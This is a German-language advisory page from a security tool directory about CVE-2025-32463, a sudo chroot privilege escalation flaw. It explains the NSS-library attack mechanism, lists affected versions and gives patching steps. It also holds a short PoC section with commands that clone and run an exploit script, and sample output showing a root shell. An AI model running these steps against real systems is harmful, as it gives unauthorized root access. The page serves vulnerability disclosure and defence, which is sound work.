Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-32463 — CVE-2025-32463 | Kitploit
Tools/GitHubGitHub/0xblackash/cve-2025-32463
Privilege EscalationSchwachstellenanalyseExploitationPapers & ForschungLernen & BildungBinary-Exploitation
GitHub0xblackash/cve-2025-32463

CVE-2025-32463

CVE-2025-32463

Repository anzeigen
3vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 CVE-2025-32463 — “Chwoot”

_E-Business Suite 0-Day-Schwachstelle (1) (1) (1)

Kritische lokale Privilegienausweitung im am weitesten verbreiteten Linux-Privilegienmanager

CVSS Badge Status Badge Discovered Badge Type Badge

Jeder lokale Benutzer (auch ohne sudoers-Berechtigungen) könnte in Sekunden Root werden, indem er sudo -R verwendet


⚠️ Überblick

CVE-2025-32463 (auch bekannt als „chroot-to-root“) ist eine kritische lokale Privilegienausweitung in sudo.

Sie erlaubt jedem lokalen Benutzer ohne Privilegien – selbst solchen, die nicht in sudoers aufgeführt sind –, vollen Root-Zugriff zu erlangen, indem er einfach die Option -R / --chroot verwendet.

Der Fehler wurde in sudo 1.9.14 (Juni 2023) eingeführt und bestand bis 1.9.17p1 (Juni 2025). Es handelte sich nicht um einen traditionellen Bug, sondern um eine gefährliche Nebenwirkung der Art und Weise, wie sudo die Pfadauflösung innerhalb eines benutzerkontrollierten Chroots vor den Richtlinienprüfungen handhabte.

Offizielle Sudo-Sicherheitswarnung: „Ein Angreifer kann sudo’s -R-Option ausnutzen, um beliebige Befehle als Root auszuführen, selbst wenn dieser nicht in der sudoers-Datei aufgeführt ist.“


🔥 Schweregrad & Auswirkungen

  • CVSS v3.1 Basisbewertung: 9.3 / Kritisch
  • Angriffsvektor: Lokal (keine Authentifizierung, kein Netzwerk)
  • Erforderliche Berechtigungen: Keine (jeder lokale Account)
  • Auswirkung: Vollständiger Root-Zugriff, beliebige Codeausführung als Root

Realitätscheck:

  • Öffentliche Exploits und PoCs erschienen sofort nach der Offenlegung.
  • Aufgenommen in den CISA Known Exploited Vulnerabilities (KEV)-Katalog am 29. September 2025.
  • Betrifft praktisch alle Linux-Distributionen und macOS-Systeme mit betroffenen sudo-Versionen.
  • Hätte mit anderen Angriffen zur vollständigen Systemübernahme kombiniert werden können.

🕵️ Der Entdecker: Rich Mirch

  • Rich Mirch – Principal Security Researcher bei der Stratascale Cybersecurity Research Unit (CRU).
  • Hat das Problem am 1. April 2025 privat an den sudo-Maintainer Todd C. Miller gemeldet.
  • CVE am 8. April 2025 zugewiesen.
  • Öffentliche Analyse und vollständiger PoC am 30. Juni 2025 zusammen mit der Offenlegung veröffentlicht.
  • Auch für die verwandte CVE-2025-32462 verantwortlich.

🔬 Technische Tiefenanalyse

Der Bug entstand aus einer Änderung der sudo-Befehlsabgleichslogik von 2023:

  1. Wenn -R /path verwendet wird, ruft sudo pivot_root() vor der vollständigen Auswertung der sudoers-Richtlinie auf.
  2. NSS (Name Service Switch)-Lookups (für Benutzer/Gruppen/PAM) lesen dann /etc/nsswitch.conf aus dem Chroot heraus.
  3. Ein Angreifer erstellt ein gefälschtes Chroot-Verzeichnis mit:
    • Einer bösartigen /etc/nsswitch.conf (z. B. passwd: /woot1337)
    • Einem Schurkenbibliothek libnss_/woot1337.so.2, die einen Konstruktor enthält, der als Root läuft.
  4. NSS lädt die Bibliothek des Angreifers mit Root-Rechten → sofortige Root-Shell.

Wichtige Erkenntnis: Die Option -R war selbst für Benutzer ohne sudo-Berechtigungen erlaubt, was sie zu einem perfekten Angriffsvektor machte.


📅 Zeitleiste


🖥️ Betroffene Systeme & Distributionen

Nur sudo 1.9.14 bis 1.9.17 (vor 1.9.17p1)

Weit verbreitet betroffen:

  • Ubuntu 24.04 (1.9.15p5, 1.9.16p2)
  • Fedora 40/41/42
  • Debian 12/13 (testing)
  • RHEL 9/10, AlmaLinux, Rocky Linux
  • Arch Linux, openSUSE Tumbleweed
  • macOS (Homebrew / MacPorts sudo)
  • Fast alle Container-Images von Mitte 2023 bis Mitte 2025

NICHT betroffen:

  • sudo ≤ 1.9.13 (keine anfällige Chroot-Logik)
  • sudo ≥ 1.9.17p1
  • Systeme, bei denen die Chroot-Funktion nie aktiviert wurde

💥 Öffentlicher Exploit & PoC

Einzeiler-Exploit (von Stratascale CRU):

chwoot
root@kitploit:~
# 1 – clone repo
$ git clone https://github.com/zaryouhashraf/CVE-2025-32463
$ cd CVE-2025-32463

# 2 – build and run Docker image (tagged "sudo-chwoot")
$ sudo chmod +x CVE-2025-32463.sh
$ ./CVE-2025-32463.sh

# 3 – run exploit in container (runs root command directly or drops you into a root shell)
┌──(kali㉿kali)-[~]
└─$ ./CVE-2025-32463.sh
═══════════════════════════════════════════════════════════════
⚠  WARNING: CVE-2025-32463 EXPLOIT PoC ⚠
═══════════════════════════════════════════════════════════════
This script is for AUTHORIZED TESTING ONLY on systems you own.
Running on unauthorized systems is ILLEGAL.
Patch immediately after testing (sudo 1.9.17p1+).

[+] Creating temporary exploit stage...
[+] Compiling malicious NSS library...
[+] Triggering sudo -R ... (expect root shell)
   (If successful, you'll drop into a root bash prompt)


[!] CVE-2025-32463 triggered - gaining root...
[+] You are now root!
┌──(root㉿kali)-[/]
└─# whoami
root

🛡️ So prüfen und beheben Sie die Schwachstelle (Ausgabe 2026)

1. Prüfen Sie Ihre Version

root@kitploit:~
sudo -V | head -n 1

✅ Sicher, wenn 1.9.17p1 oder neuer (oder ≤ 1.9.13)

2. Sofort aktualisieren

Debian/Ubuntu:

root@kitploit:~
sudo apt update && sudo apt install --reinstall sudo

Fedora/RHEL:

root@kitploit:~
sudo dnf update sudo

Arch:

root@kitploit:~
sudo pacman -S sudo

3. Härtung (auch nach dem Patchen)

Fügen Sie zu /etc/sudoers (oder einer Datei in /etc/sudoers.d/) hinzu:

root@kitploit:~
Defaults !use_chroot

Suchen und entfernen Sie alle CHROOT=- oder runchroot=-Zeilen.

Profi-Tipp 2026: Scannen Sie alte Docker-Images, CI-Runner und Legacy-VMs – viele enthalten noch anfällige sudo-Snapshots.


📈 Entwicklungen nach dem Vorfall (2025–2026)

  • Chroot-Funktion offiziell veraltet und für die Entfernung in zukünftigen sudo-Versionen vorgesehen.
  • Große Distributionen haben Patches innerhalb weniger Tage zurückportiert.
  • CISA-KEV-Eintrag löste obligatorische Behebung für US-Bundessysteme aus.
  • Erhöhte Überprüfung von sudo’s NSS-Integration und Pfadauflösung vor der Richtlinie.

🎓 Gelernte Lektionen

  • Vertrauen Sie benutzerkontrollierten Pfaden nie vor Privilegienprüfungen.
  • Funktionen für fortgeschrittene Nutzung (--chroot) können zur Angriffsfläche werden, wenn sie nicht isoliert sind.
  • Einzeilige Änderungen im Jahr 2023 führten zu einer kritischen Schwachstelle, die zwei Jahre später entdeckt wurde.
  • Öffentliche PoCs + KEV-Listing = schnelles Risiko einer weit verbreiteten Ausnutzung.

Dieser Vorfall unterstrich die Notwendigkeit des Prinzips der geringsten Privilegien selbst in Kernsystemwerkzeugen.


🔗 Referenzen & Weiterführende Literatur

  • NVD Offizieller Eintrag
  • Sudo Offizielle Sicherheitswarnung
  • Stratascale Vollständige Analyse + PoC
  • Oligo Security Blog (mit CVE-2025-32462 Kontext)
  • CISA-KEV-Katalogeintrag
  • Red Hat Sicherheitswarnung
  • GitHub PoC

Stand März 2026: ✅ Auf allen modernen Systemen vollständig behoben • Chroot-Funktion veraltet • Ökosystem sicherer

Mit ❤️ gemacht für Linux-Administratoren, die vor dem KEV-Eintrag gepatcht haben

Tool herunterladen
DatumEreignis
Juni 2023sudo 1.9.14 veröffentlicht (Bug eingeführt)
1. April 2025Rich Mirch meldet privat
8. April 2025CVE-2025-32463 zugewiesen
9. Juni 2025Patch vorgeschlagen
30. Juni 2025Öffentliche Offenlegung + Stratascale-Blog + vollständiger PoC
Juli 2025sudo 1.9.17p1 veröffentlicht; große Distributionen veröffentlichen Updates
29. September 2025Aufnahme in den CISA-KEV-Katalog
2026Chroot-Funktion wird im gesamten Ökosystem vollständig eingestellt